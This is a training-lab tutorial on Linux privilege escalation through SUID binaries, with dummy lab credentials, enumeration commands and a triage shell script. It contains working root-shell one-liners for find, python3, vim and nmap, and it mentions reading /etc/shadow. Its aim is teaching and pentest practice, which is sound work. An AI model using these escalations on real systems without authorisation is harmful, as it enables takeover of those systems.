🐧 Linux Privilege Escalation Lab

PRACIVO LAB — INTENTIONALLY VULNERABLE
⚠️ Pracivo Security Lab — Linux privilege escalation techniques. Start as a low-privilege user and escalate to root.
Lab Credentials: ram / pracivo  |  alice / alice123  |  root / toor (goal: escalate to this)

SUID Binary Abuse

PRIVILEGE ESCALATION

SUID (Set User ID) binaries run with the effective UID of their owner, not of the user executing them. If a SUID binary is owned by root and lets you run a command of your choice (that is what GTFOBins catalogs), you get a shell with a root EUID. Two things to keep in mind while exploiting them: the kernel ignores the SUID bit on interpreted scripts (only the ELF interpreter itself counts) and on filesystems mounted nosuid, and bash resets a root EUID back to your real UID at startup unless you pass -p, which is why every payload below ends in sh -p.

# Step 1: Find all SUID binaries on the system
find / -perm -u=s -type f 2>/dev/null

# Common output on a vulnerable machine (shown as ls -l of the hits; plain find prints only the paths):
-rwsr-xr-x 1 root root /usr/bin/passwd
-rwsr-xr-x 1 root root /usr/bin/sudo
-rwsr-xr-x 1 root root /usr/bin/find       ← DANGEROUS
-rwsr-xr-x 1 root root /usr/bin/vim        ← DANGEROUS
-rwsr-xr-x 1 root root /usr/bin/python3    ← DANGEROUS
-rwsr-xr-x 1 root root /usr/local/bin/nmap ← DANGEROUS

# Step 2: Check GTFOBins for each binary
# GTFOBins: https://gtfobins.github.io/

# Exploit: /usr/bin/find with SUID
find . -exec /bin/sh -p \; -quit
# -p stops sh from resetting its EUID to your real UID; without it you just get a normal shell

# Exploit: /usr/bin/python3 with SUID
python3 -c 'import os; os.execl("/bin/sh", "sh", "-p")'

# Exploit: /usr/bin/vim with SUID
# ':!cmd' is run through vim's 'shell' option (normally $SHELL). If that is bash,
# bash drops the root EUID before your command runs, so the SUID entry on GTFOBins
# uses the built-in Python binding instead (needs vim built with Python; use :py for Python 2):
vim -c ':py3 import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'
# The simple form only keeps root if the configured shell does not drop privileges (e.g. dash as /bin/sh):
vim -c ':!/bin/sh -p'

# Exploit: /usr/bin/nmap (interactive mode exists only in versions 2.02 to 5.21)
nmap --interactive
!sh

# After exploitation: verify you are root. A shell reached via "sh -p" keeps your real UID and
# only the effective UID is 0, so expect euid=0(root) in the output, not uid=0:
id
# uid=1000(ram) gid=1000(ram) euid=0(root) groups=1000(ram)
# That is enough to read /etc/shadow or write /etc/passwd. Only a process that calls setuid(0)
# from this shell (or a binary that does so itself) shows the plain uid=0(root) gid=0(root) line.
✅ Practice: On a real Linux VM, run the find command and check each result on GTFOBins. Every pentest engagement checks for SUID misconfigs.
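The Step 1 and Step 2 loop above (enumerate, then check every hit against GTFOBins) is tedious by hand on a box with forty SUID files. The script below is an added lab helper, not part of the original page or of GTFOBins: it runs the same find, sorts each hit into "baseline" (SUID on a stock install and not exploitable just for being SUID), "DANGEROUS" (a name with a GTFOBins SUID section) or "review" (unknown, check by hand), and checks an id(1) line for the euid=0 marker the exploits above produce. Both word lists are hand-picked assumptions; the GTFOBins site remains the authority, and anything in the "review" bucket still has to be looked up.

```shell
#!/bin/sh
# suid_triage.sh: enumerate SUID binaries and flag the ones with a GTFOBins SUID entry.
# Added lab helper, not part of the original page. The two word lists below are
# hand-picked assumptions; the authoritative list is https://gtfobins.github.io/.

# SUID root on a normal install and NOT a privesc just for being SUID:
# these binaries drop privileges themselves before doing anything user-controlled.
BASELINE="passwd sudo su mount umount chsh chfn gpasswd newgrp pkexec fusermount ping"

# Binaries whose GTFOBins page has a SUID section: a SUID-root copy hands over
# a root-EUID shell (or arbitrary file read/write as root).
GTFOBINS_SUID="find vim vi nmap python python2 python3 perl bash sh env awk gawk less more cp mv nano"

# find_suid [ROOT]: print every SUID file under ROOT (default /); -perm -4000 is the
# octal spelling of -perm -u=s. Unreadable directories are silently skipped.
find_suid() {
    find "${1:-/}" -perm -4000 -type f 2>/dev/null
}

# in_list WORD "w1 w2 ...": succeed if WORD appears in the space-separated list.
in_list() {
    for w in $2; do
        [ "$w" = "$1" ] && return 0
    done
    return 1
}

# triage_suid PATH...: one line per path, classified by its basename.
triage_suid() {
    for p in "$@"; do
        name=${p##*/}
        if in_list "$name" "$GTFOBINS_SUID"; then
            printf 'DANGEROUS %s (GTFOBins SUID entry for %s)\n' "$p" "$name"
        elif in_list "$name" "$BASELINE"; then
            printf 'baseline  %s\n' "$p"
        else
            printf 'review    %s (on neither list; check GTFOBins by hand)\n' "$p"
        fi
    done
}

# count_dangerous PATH...: number of DANGEROUS hits (prints 0 when there are none).
count_dangerous() {
    triage_suid "$@" | grep -c '^DANGEROUS' || true
}

# shell_has_root "ID_OUTPUT": succeed if the id(1) output shows uid 0 or euid 0.
# A shell reached through "sh -p" keeps the real UID and shows only euid=0(root).
shell_has_root() {
    case " $1 " in
        *" uid=0("*|*" euid=0("*) return 0 ;;
        *) return 1 ;;
    esac
}

# Constructed sample input: the paths from the lab's "common output" listing.
SAMPLE="/usr/bin/passwd /usr/bin/sudo /usr/bin/find /usr/bin/vim /usr/bin/python3 /usr/local/bin/nmap"
triage_suid $SAMPLE
printf '%s dangerous SUID binaries\n' "$(count_dangerous $SAMPLE)"
# On the real lab box, scan instead of using the sample:  triage_suid $(find_suid /)
```

Run it as the low-privilege lab user; the find itself needs no privileges, and the 2>/dev/null only hides the permission-denied noise from directories you cannot enter. A "baseline" verdict means the binary is SUID by design, not that it is safe in every version, so keep version checks (like the nmap 2.02 to 5.21 window) as a separate step.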